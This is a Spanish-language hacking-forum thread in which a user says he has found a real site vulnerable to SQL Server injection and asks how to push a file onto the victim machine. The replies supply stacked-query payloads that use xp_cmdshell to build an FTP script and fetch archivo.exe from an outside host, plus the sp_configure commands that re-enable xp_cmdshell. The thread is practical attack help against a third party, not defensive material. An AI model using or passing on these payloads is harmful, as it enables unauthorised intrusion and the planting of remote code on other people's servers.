Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: PHAMTOM en 18 Febrero 2010, 04:07 am


Título: Pregunta sobre inyeccion sqlserver.
Publicado por: PHAMTOM en 18 Febrero 2010, 04:07 am
Buenas,encontré una pagina vulnerable a sql inyection,SQLSERVER.-

quisiera saber si hay algun metodo , que con la inyeccion subir un archivo de mi pc , al pc remoto vulnerable..

La inyeccion la hago por un formulario..-


Saludos,PHAMTOM

Título: Re: Pregunta sobre inyeccion sqlserver.
Publicado por: nacho87 en 19 Febrero 2010, 09:16 am
En el remoto caso de que el user sea admin y la inyección permita stacked querys puedes hacer:
Código:
;master..xp_cmdshell 'cmd /c echo get archivo.exe>asd.txt';
;master..xp_cmdshell 'cmd /c echo quit>>asd.txt';
;master..xp_cmdshell 'cmd /c ftp -s:asd.txt ftp.anonimo.com'

Asi te conectas al server anonimo ftp.anonimo.com y te descargas el archivo archivo.exe. Si la BBDD es mssql server 2005 puede que tengas que reactivar el xp_cmdshell. Busca en internet como se hace que ahora mismo no me acuerdo.jeje. son un par de comandos más.

Saludos!!

Título: Re: Pregunta sobre inyeccion sqlserver.
Publicado por: Shell Root en 19 Febrero 2010, 19:20 pm
Creo que es...
Código
  1. EXEC sp_configure 'show advanced options', 1
  2. RECONFIGURE
  3.  
  4. EXEC sp_configure 'xp_cmdshell', 1
  5. RECONFIGURE


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines